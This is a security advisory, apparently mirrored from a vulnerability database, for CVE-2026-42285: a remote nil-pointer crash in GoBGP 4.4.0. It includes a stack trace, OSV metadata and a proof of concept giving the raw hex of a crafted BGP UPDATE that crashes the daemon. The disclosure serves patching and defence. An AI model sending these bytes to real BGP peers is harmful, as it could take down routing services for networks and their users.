GHSA-P3W2-64XM-833J
Vulnerability from github – Published: 2026-05-05 20:57 – Updated: 2026-05-08 20:42
VLAI?
Summary
GoBGP has a panic in AdjRib.Update via malformed BGP Update message (Nil Pointer Dereference)
Details
Summary
Remote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing An unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.
Details
The vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.
Triggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., "attribute value length is short"), GoBGP logs a warning: the received Update message was treated as withdraw.
Code Path:
The message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.
Due to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.
The execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.
The Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.
Log Snippet:
{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]
goroutine 52 [running]:
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
/home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8
github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)
/home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)
/home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)
/home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25
github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)
/home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82
created by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37
/home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5
PoC
[SEND] OPEN
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00
[RECV] Type: 1 | Length: 77
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02
[+] Received OPEN from peer
[SEND] KEEPALIVE
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[RECV] Type: 4 | Length: 19
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[+] BGP Session Established
[SEND] Crafted UPDATE
Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00
[*] Waiting for peer reaction...
[+] Done.
Impact
Remote Denial of Service (DoS) in GoBGP v4.4.0
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/osrg/gobgp/v4"
},
"ranges": [
{
"events": [
{
"introduced": "4.4.0"
},
{
"fixed": "4.5.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"4.4.0"
]
}
],
"aliases": [
"CVE-2026-42285"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T20:57:14Z",
"nvd_published_at": "2026-05-07T12:16:18Z",
"severity": "HIGH"
},
"details": "### Summary\nRemote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing\nAn unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a \"withdraw\" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.\n\n\n### Details\nThe vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.\n\nTriggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., \"attribute value length is short\"), GoBGP logs a warning: the received Update message was treated as withdraw.\n\nCode Path:\n\nThe message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.\n\nDue to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.\n\nThe execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.\n\nThe Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.\n\nLog Snippet:\n```\n{\"time\":\"2026-04-21T12:43:10.009107962+08:00\",\"level\":\"WARN\",\"msg\":\"the received Update message was treated as withdraw\",\"Topic\":\"Peer\",\"Key\":\"192.168.31.195\",\"State\":\"BGP_FSM_ESTABLISHED\",\"Error\":\"attribute value length is short\"}\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]\n\ngoroutine 52 [running]:\ngithub.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})\n /home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8\ngithub.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)\n /home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4\ngithub.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)\n /home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6\ngithub.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)\n /home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25\ngithub.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)\n /home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82\ncreated by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37\n /home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5\n\n```\n\n### PoC\n```\n[SEND] OPEN\n Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00\n[RECV] Type: 1 | Length: 77\n Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02\n[+] Received OPEN from peer\n[SEND] KEEPALIVE\n Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04\n[RECV] Type: 4 | Length: 19\n Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04\n[+] BGP Session Established\n[SEND] Crafted UPDATE\n Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00\n[*] Waiting for peer reaction...\n[+] Done.\n```\n\n### Impact\nRemote Denial of Service (DoS) in GoBGP v4.4.0",
"id": "GHSA-p3w2-64xm-833j",
"modified": "2026-05-08T20:42:39Z",
"published": "2026-05-05T20:57:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/security/advisories/GHSA-p3w2-64xm-833j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42285"
},
{
"type": "PACKAGE",
"url": "https://github.com/osrg/gobgp"
},
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/releases/tag/v4.5.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "GoBGP has a panic in AdjRib.Update via malformed BGP Update message (Nil Pointer Dereference)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…